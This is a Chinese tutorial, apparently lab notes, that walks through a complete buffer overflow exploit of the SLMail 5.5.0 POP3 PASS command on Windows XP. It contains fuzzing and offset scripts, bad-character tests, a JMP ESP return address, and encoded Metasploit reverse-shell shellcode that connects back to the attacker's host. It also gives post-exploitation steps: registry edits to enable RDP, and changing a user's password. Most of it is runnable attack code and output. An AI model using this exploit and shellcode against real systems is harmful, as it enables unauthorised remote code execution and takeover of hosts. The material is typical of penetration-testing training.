緩衝區溢出實例html

緩衝區溢出原理:http://www.cnblogs.com/fanzhidongyzby/archive/2013/08/10/3250405.htmlpython

空間存儲了用戶程序的函數棧幀(包括參數、局部數據等),實現函數調用機制,它的數據增加方向是低地址方向。堆空間存儲了程序運行時動態申請的內存數據等,數據增加方向是高地址方向。除了代碼段和受操做系統保護的數據區域,其餘的內存區域均可能做爲緩衝區,所以緩衝區溢出的位置可能在數據段,也可能在堆、棧段。若是程序的代碼有軟件漏洞,惡意程序會「教唆」程序計數器從上述緩衝區內取指,執行惡意程序提供的數據代碼!linux

如何發現漏洞:ios

一、源碼審計shell

二、逆向工程swift

三、模糊測試(將應用程序,運行在本身設置的合適環境,對其進行調試)windows

1.向程序堆棧半隨機的數據,根據內存變化判斷溢出sass

2.數據生成器:生成隨機、半隨機數據安全

3..測試工具:識別溢出漏洞(動態調試工具【逆向工程相關工具】)服務器

注:

在進行本機調試時,需把kali的防火牆設置一下,防止在學習滲透過程當中受到攻擊。

iptable -A INPUT -p tcpp --destination-port 4444 \! -d 127.0.0.1 -j DORP           #只容許在本機上訪問4444端口

iptable -A INPUT -p tcpp --destination-port 13327 \! -d 127.0.0.1 -j DORP        #只容許在本機上訪問13327端口

環境:【系統緩衝區溢出,可能是其服務】

靶機:winXP【不建議win七、win8,由於XP系統沒有安全防禦機制】【192.168.1.126】

目標程序:SLMail 5.5.0 Mail Server(郵件服務器);【ports:50 110 139 8376】

動態調試工具:ImmunityDebugger_1_85_setup.exe【自動化程序高,可調用python腳本,使用python2.7環境】

腳本:mona.py【用於定位進程模塊,移動僅Debug的Pycommend文件中】   http://www.tuicool.com/articles/N3YFfeE

操做機:kali2.0【192.168.1.127】

注:現不能繞過防火牆,需關閉防火牆

SLMail 5.5.0 Mail Server

POP3 PASS命令存在緩衝區溢出漏洞,無需身份驗證明現遠程代碼執行。

DEP:一種結合軟硬件安全機制,阻止代碼從內存數據頁中被執行;【可繞過】

ASLR(動態內存分配):隨機內存地址加載執行程序和DLL,每次重啓,內存地址變化

安裝完成後,測試端口

利用原理:「PASS」命令後,當一些特殊定製的命令輸入,會形成緩衝區溢出,上傳shellcode,可控制目標系統,則不須要通過身份驗證,得到權限

1、測試哪一個命令會出現緩衝區溢出

01.py【最簡單的功能實現】

【注:如何瞭解應用/協議能接受的固定指令:一、Wireshark  二、RFC【必須理解系統底層和協議底層】】

  1. #!/usr/bin/python
  2.  
  3. import socket
  4. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  5.  
  6. try:
  7. print "\nSending evil buffer..."
  8. s.connect(("192.168.1.126",110))
  9. data = s.recv(1024) ###將110端口返回的數據顯示在屏幕中
  10. print data
  11.  
  12. s.send("USER Xuan"+"\r\n")
  13. data = s.recv(1024)
  14. print data
  15.  
  16. s.send("PASS test\r\n")
  17. data = s.recv(1024)
  18. print data
  19.  
  20. s.close()
  21. print "\nDone"
  22.  
  23. except:
  24. print "Could not connect to POP3!"

02.py【不斷增大發送量,經過Debug肯定是否會溢出】【若發到數目很大,還沒溢出,則可放棄】##大概肯定範圍

  1. #!/usr/bin/python
  2.  
  3. import socket
  4.  
  5. buffer=["A"]
  6. counter=100
  7. while len(buffer) <= 50:
  8. buffer.append("A"*counter)
  9. counter=counter+200
  10.  
  11. for string in buffer:
  12. print "Fuzzing PASS with %s bytes" % len(string)
  13. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  14. connect = s.connect(("192.168.1.126",110))
  15. s.recv(1024)
  16. s.send("USER test"+"\r\n")
  17. s.recv(1024)
  18. s.send("PASS "+string+"\r\n")
  19. s.send("QUIT\r\n")
  20. s.close()

##經過調試工具查看是否異常?【靜態調試(彙編)、動態調試(正在運行的進程:attach)】
110端口【SLmail】:netstat -nao【查看=系統進程的PID和端口等信息】

###重點關注寄存器

#ESP:當ESP中輸入數據過多,將會把EIP的內存地址覆蓋

#EIP:下一跳指令的內存地址,若下一跳指令被修改,則可執行某一地址空間,運行shellcode

注:模糊測試過程需不斷將服務重啓,過程比較繁瑣

03.py【手動嘗試,找到溢出範圍】

  1. #!/usr/bin/python
  2. import socket
  3.  
  4. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  5. buffer = 'A' * 2600
  6.  
  7. try:
  8. print "\nSending evil buffer..."
  9. s.connect(("192.168.1.126",110))
  10. data = s.recv(1024)
  11. s.send("USER test"+"\r\n")
  12. data = s.recv(1024)
  13. s.send("PASS "+buffer+"\r\n")
  14. print "\nDone!."
  15. except:
  16. print "Could not connect to POP3!"
  17. ~


#緩衝區溢出雖然發生了,但A未修改EIP,則證實溢出的字符數目應在2600~2700之間

04.py#精肯定位【二分法或惟一字符串法】

#生成2700個每四個字符爲一組的惟一字符串,使用kali中metasploit腳本工具

  1. root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_create.rb 2700
  1. Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9

##將這2700個字符添加進03.py腳本中,做爲buffer的參數

#EIP:39694438#由於在內存中數據的讀寫順序與人類讀寫順序相反,則此ASCII碼應爲38 44 69 39

根據ASCII碼錶可得此4個字符爲8Di9

#計算偏移量【在此字符串前面有2606個字符】

  1. root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_offset.rb 39694438
  2. [*] Exact match at offset 2606<strong>
  3. </strong>

05.py【確認是否真爲此位置】

  1. #!/usr/bin/python
  2. import socket
  3.  
  4. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  5. buffer = 'A' * 2606+'B'*4+'C'*20
  6.  
  7. try:
  8. print "\nSending evil buffer..."
  9. s.connect(("192.168.1.126",110))
  10. data = s.recv(1024)
  11. s.send("USER test"+"\r\n")
  12. data = s.recv(1024)
  13. s.send("PASS "+buffer+"\r\n")
  14. print "\nDone!."
  15. except:
  16. print "Could not connect to POP3!"

思路:將EIP修改成shellcode代碼的內存地址,將shellcode寫入到該地址空間,程序讀取EIP寄存器數值,將跳轉到shellcode代碼段並執行

#尋找可存放shellcode的內存空間(本章考慮ESP)

06.py【手動修改C數值,判斷內存空間大小是否能放一下shellcode,本章假設ESP寄存器可放3500】

  1. #!/usr/bin/python
  2. import socket
  3.  
  4. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  5. buffer = 'A' * 2606+'B'*4+'C'*(3500-2606+4)
  6.  
  7. try:
  8. print "\nSending evil buffer..."
  9. s.connect(("192.168.1.126",110))
  10. data = s.recv(1024)
  11. s.send("USER test"+"\r\n")
  12. data = s.recv(1024)
  13. s.send("PASS "+buffer+"\r\n")
  14. print "\nDone!."
  15. except:
  16. print "Could not connect to POP3!"

#選擇ESP,右鍵:follow in dump

#從第一個出現C的地址計算到最後一個C的地址  #能夠經過右鍵Hex,選擇16進製表示,方便閱讀

##起始地址爲:0167A154 終止地址爲:0167A2F4

#使用科學計算器,windows下,calc->查看->十六進制,減去結果再轉化爲十進制,得結果爲416

#最小的shellcode爲300字節左右,所以ESP足夠放下一個shellcode

#在作模糊測試過程當中,由於不一樣類型的程序、協議、漏洞,會將某些字符認爲是壞字符,,這些字符有固定用途。如:null byte (0x00)空字符,用於終止字符串的拷貝操做;return (0x0D)回車操做,表示POP3 PASS指令操做完畢。注:返回地址、shellcode、buffer都不能出現壞字符

07.py【思路:發送0x00-0xff 256個字符,查找全部的壞字符】

  1. #!/usr/bin/python
  2. import socket
  3.  
  4. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  5. badchars = (
  6. "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0b\x0c\x0d\x0e\x0f\x00"
  7. "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x10"
  8. "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x20"
  9. "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x30"
  10. "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\4e\x4f\x40"
  11. "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x50"
  12. "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x60"
  13. "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x70"
  14. "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x80"
  15. "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\x90"
  16. "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xa0"
  17. "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xb0"
  18. "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xc0"
  19. "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xd0"
  20. "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xe0"
  21. "\xe1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xf0"
  22. )
  23.  
  24. buffer = "A"*2606 + "B"*4 + badchars
  25.  
  26. try:
  27.    print "\nSending evil buffer..."
  28.    s.connect(("192.168.1.126",110))
  29.    data = s.recv(1024)
  30.    s.send("USER test"+"\r\n")
  31.    data = s.recv(1024)
  32.    s.send("PASS "+buffer+"\r\n")
  33.    print "\nDone!."
  34. except:
  35.    print "Could not connect to POP3!"

#右鍵follow in dump

#此字符後,數據顯示異常,則該字符(0A)可能有問題,進行下一步驗證【修改0A爲某一正常字符從新發送】

#驗證得0A 爲壞字符 ;0D爲壞字符不出現,縮進一格,所有檢查,發現00也被過濾,則可發現該實驗中壞字符爲:0x00  0x0D 0x0A

重定向數據流,用ESP的地址替換EIP的值,可是ESP的地址是變化的,不能使用硬編碼。在SLMali線程應用程序中,操做系統爲每一個線程分配一段的地址範圍,每一個線程地址範圍不肯定

變通思路:在內存地址中尋找固定的系統模塊,在模塊中尋找JMP ESP指令的地址跳轉,再由該指令簡介跳轉到ESP,從而執行shellcode。利用mona.py腳本識別內存模塊,搜素「return address」是JMP ESP指令的模塊,尋找無DEP、ALSP保護的內存地址【內存地址不能包含壞字符】{從EIP跳到JMP ESP,再跳到ESP}

#輸入!mona modules 查找模塊【選擇前四個模塊爲false,最後一個OS dll爲true】

#OS dll:操做系統動態鏈接庫,表示可運行在任意系統中,若爲false則可能在其餘系統中不能運行

!mona modules

!mona find -s "\xff\xe4" -m openc32.dll【在該進程模塊查找是否有執行JMP ESP的命令】

【JMP ESP爲彙編指令,需轉換爲二進制指令FFE4】

#nasm_shell.rb腳本的做用就是用來轉換匯編指令

  1. root@kali:~# locate nasm_shell.rb
  2. /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
  3. root@kali:~# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
  4. nasm > jmp esp
  5. 00000000 FFE4 jmp esp
  6. nasm >

#若一個失敗繼續尋找下面的模塊,也有可能找不到,可想別的辦法

雙擊任意一個指令,在內存數據框中,右鍵->Disassemble切換爲彙編語言

可去memory map中查看詳細內容【看到其基地址等】

##由於SLmail自己不支持DEP和ASLR等內存保護機制,因此應該任意一個指令均可以實現跳轉。若是有DEP保護,必須尋找到code行Access列中有R E兩個權限(屬於繞過DEP)

在該地址,經過設置斷點,判斷其下一步操做,驗證是否能實現跳轉

08.py【驗證斷點是否正常跳轉】

#由於計算機讀取數據爲翻轉【爲跳轉地址】

  1. #!/usr/bin/python
  2. import socket
  3.  
  4. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  5. buffer = 'A' * 2606 + "\x8f\x35\x4a\x5f" + "C" *390
  6.  
  7. try:
  8. print "\nSending evil buffer..."
  9. s.connect(("192.168.1.126",110))
  10. data = s.recv(1024)
  11. s.send("USER test"+"\r\n")
  12. data = s.recv(1024)
  13. s.send("PASS "+buffer+"\r\n")
  14. print "\nDone!."
  15. except:
  16. print "Could not connect to POP3!"
  17. ~


#按F7(單步向前執行)

#將腳本里的shellcode替換成shellcode,則可得到控制

Shellcode

可用Scapy編寫,也可用./msfpayload -l自動生成shellcode【該工具中含有大量針對各類系統的shellcode】

###正向開後門基本杜絕,要進行反向開後門

  1. root@kali:/usr/share/framework2# ./msfpayload win32_reverse LHOST=192.168.1.127 LPORT=444 C
  2. "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  3. "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  4. "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  5. "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  6. "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  7. "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  8. "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  9. "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  10. "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  11. "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68"
  12. "\xc0\xa8\x01\x7f\x66\x68\x01\xbc\x66\x53\x89\xe1\x95\x68\xec\xf9"
  13. "\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68"
  14. "\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3"
  15. "\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab"
  16. "\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51"
  17. "\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6"
  18. "\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6"
  19. "\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";<strong>
  20. </strong>

###過慮壞字符

./msfencode -b【編碼工具,可將病毒的特徵字符編得面目全非,必定程度上能夠實現免殺】

  1. root@kali:/usr/share/framework2# ./msfpayload win32_reverse LHOST=192.168.1.127 LPORT=444 R | ./msfencode -b "\x00\x0a\x0d"
  2. [*] Using Msf::Encoder::PexFnstenvMov with final size of 310 bytes
  3. "\x6a\x48\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf9\xe1\xc8".
  4. "\x2f\x83\xeb\xfc\xe2\xf4\x05\x8b\x23\x62\x11\x18\x37\xd0\x06\x81".
  5. "\x43\x43\xdd\xc5\x43\x6a\xc5\x6a\xb4\x2a\x81\xe0\x27\xa4\xb6\xf9".
  6. "\x43\x70\xd9\xe0\x23\x66\x72\xd5\x43\x2e\x17\xd0\x08\xb6\x55\x65".
  7. "\x08\x5b\xfe\x20\x02\x22\xf8\x23\x23\xdb\xc2\xb5\xec\x07\x8c\x04".
  8. "\x43\x70\xdd\xe0\x23\x49\x72\xed\x83\xa4\xa6\xfd\xc9\xc4\xfa\xcd".
  9. "\x43\xa6\x95\xc5\xd4\x4e\x3a\xd0\x13\x4b\x72\xa2\xf8\xa4\xb9\xed".
  10. "\x43\x5f\xe5\x4c\x43\x6f\xf1\xbf\xa0\xa1\xb7\xef\x24\x7f\x06\x37".
  11. "\xae\x7c\x9f\x89\xfb\x1d\x91\x96\xbb\x1d\xa6\xb5\x37\xff\x91\x2a".
  12. "\x25\xd3\xc2\xb1\x37\xf9\xa6\x68\x2d\x49\x78\x0c\xc0\x2d\xac\x8b".
  13. "\xca\xd0\x29\x89\x11\x26\x0c\x4c\x9f\xd0\x2f\xb2\x9b\x7c\xaa\xa2".
  14. "\x9b\x6c\xaa\x1e\x18\x47\x39\x49\xc9\x50\x9f\x89\xc9\x93\x9f\xb2".
  15. "\x41\xce\x6c\x89\x24\xd6\x53\x81\x9f\xd0\x2f\x8b\xd8\x7e\xac\x1e".
  16. "\x18\x49\x93\x85\xae\x47\x9a\x8c\xa2\x7f\xa0\xc8\x04\xa6\x1e\x8b".
  17. "\x8c\xa6\x1b\xd0\x08\xdc\x53\x74\x41\xd2\x07\xa3\xe5\xd1\xbb\xcd".
  18. "\x45\x55\xc1\x4a\x63\x84\x91\x93\x36\x9c\xef\x1e\xbd\x07\x06\x37".
  19. "\x93\x78\xab\xb0\x99\x7e\x93\xe0\x99\x7e\xac\xb0\x37\xff\x91\x4c".
  20. "\x11\x2a\x37\xb2\x37\xf9\x93\x1e\x37\x18\x06\x31\xa0\xc8\x80\x27".
  21. "\xb1\xd0\x8c\xe5\x37\xf9\x06\x96\x34\xd0\x29\x89\x38\xa5\xfd\xbe".
  22. "\x9b\xd0\x2f\x1e\x18\x2f";

09.py【「0x90」表示無操做,防止shellcode前部分代碼被擦除】

  1. #!/usr/bin/python
  2. import socket
  3.  
  4. s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  5.  
  6. shellcode = (
  7. "\x6a\x48\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf9\xe1\xc8"+
  8. "\x2f\x83\xeb\xfc\xe2\xf4\x05\x8b\x23\x62\x11\x18\x37\xd0\x06\x81"+
  9. "\x43\x43\xdd\xc5\x43\x6a\xc5\x6a\xb4\x2a\x81\xe0\x27\xa4\xb6\xf9"+
  10. "\x43\x70\xd9\xe0\x23\x66\x72\xd5\x43\x2e\x17\xd0\x08\xb6\x55\x65"+
  11. "\x08\x5b\xfe\x20\x02\x22\xf8\x23\x23\xdb\xc2\xb5\xec\x07\x8c\x04"+
  12. "\x43\x70\xdd\xe0\x23\x49\x72\xed\x83\xa4\xa6\xfd\xc9\xc4\xfa\xcd"+
  13. "\x43\xa6\x95\xc5\xd4\x4e\x3a\xd0\x13\x4b\x72\xa2\xf8\xa4\xb9\xed"+
  14. "\x43\x5f\xe5\x4c\x43\x6f\xf1\xbf\xa0\xa1\xb7\xef\x24\x7f\x06\x37"+
  15. "\xae\x7c\x9f\x89\xfb\x1d\x91\x96\xbb\x1d\xa6\xb5\x37\xff\x91\x2a"+
  16. "\x25\xd3\xc2\xb1\x37\xf9\xa6\x68\x2d\x49\x78\x0c\xc0\x2d\xac\x8b"+
  17. "\xca\xd0\x29\x89\x11\x26\x0c\x4c\x9f\xd0\x2f\xb2\x9b\x7c\xaa\xa2"+
  18. "\x9b\x6c\xaa\x1e\x18\x47\x39\x49\xc9\x50\x9f\x89\xc9\x93\x9f\xb2"+
  19. "\x41\xce\x6c\x89\x24\xd6\x53\x81\x9f\xd0\x2f\x8b\xd8\x7e\xac\x1e"+
  20. "\x18\x49\x93\x85\xae\x47\x9a\x8c\xa2\x7f\xa0\xc8\x04\xa6\x1e\x8b"+
  21. "\x8c\xa6\x1b\xd0\x08\xdc\x53\x74\x41\xd2\x07\xa3\xe5\xd1\xbb\xcd"+
  22. "\x45\x55\xc1\x4a\x63\x84\x91\x93\x36\x9c\xef\x1e\xbd\x07\x06\x37"+
  23. "\x93\x78\xab\xb0\x99\x7e\x93\xe0\x99\x7e\xac\xb0\x37\xff\x91\x4c"+
  24. "\x11\x2a\x37\xb2\x37\xf9\x93\x1e\x37\x18\x06\x31\xa0\xc8\x80\x27"+
  25. "\xb1\xd0\x8c\xe5\x37\xf9\x06\x96\x34\xd0\x29\x89\x38\xa5\xfd\xbe"+
  26. "\x9b\xd0\x2f\x1e\x18\x2f")
  27.  
  28. buffer = 'A' * 2606 + "\x03\x97\x4b\x5f" + "\x90" * 8 + shellcode
  29.  
  30. try:
  31.    print "\nSending evil buffer..."
  32.    s.connect(("192.168.1.126",110))
  33.    data = s.recv(1024)
  34.    s.send("USER test"+"\r\n")
  35.    data = s.recv(1024)
  36.    s.send("PASS "+buffer+"\r\n")
  37.    s.close()
  38.    print "\nDone!."
  39. except:
  40.    print "Could not connect to POP3!"

先在本地偵聽444端口,以便目標機器回連

#nc -vlp 444###getshell

##可完美地重複鏈接,但有些shellcode執行結束會以exitprocess方式退出整個進程,將致使郵件服務奔潰,會引發管理員注意,不過新版本的metasploit已經進行優化。

##因Slmail是一個基於線程的應用,使用ExitThread方式能夠避免整個服務崩潰,但是實現重複溢出

./msfpayload win32_reverse LHOST=192.168.1.127 EXITFUNC=thread LPORT=444 R | ./msfencode -b "\x00\x0a\x0d"

############################################################################################

對命令行模式的getshell不適應,可進入圖形化界面

一、在此基礎上ftp下載一個圖形化木馬管理程序

二、使用RDP打開windows系統的遠程桌面【可經過修改註冊表鍵值】

  1. C:\>echo Windows Registry Editor Version 5.00>3389.reg
  2. echo Windows Registry Editor Version 5.00>3389.reg
  3.  
  4. C:\>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
  5. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
  6.  
  7. C:\>echo "fDenyTSConnections"=dword:00000000>>3389.reg
  8. echo "fDenyTSConnections"=dword:00000000>>3389.reg
  9.  
  10. C:\>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
  11. echo [HKEY_LOCAL_MACHINE\SYSTEM Server\Wds\rdpwd\Tds\tcp]>>3389.reg
  12.  
  13. C:\>echo "PortNumber"=dword:00000d3d>>3389.reg
  14. echo "PortNumber"=dword:00000d3d>>3389.reg
  15.  
  16. C:\>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
  17. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
  18.  
  19. C:\>echo "PortNumber"=dword:00000d3d>>3389.reg
  20. echo "PortNumber"=dword:00000d3d>>3389.reg
  21.  
  22. C:\>regedit /s 3389.reg
  23. regedit /s 3389.reg
  24.  
  25. C:\>shutdown -r -t 0
  26. shutdown -r -t 0

##在kali上安裝遠程桌面

apt-get install rdesktop

rdesktop 192.168.1.126

####

可在命令行窗口模式下修改用戶密碼,或增長用戶和密碼得到管理權限

net user Xuan pass

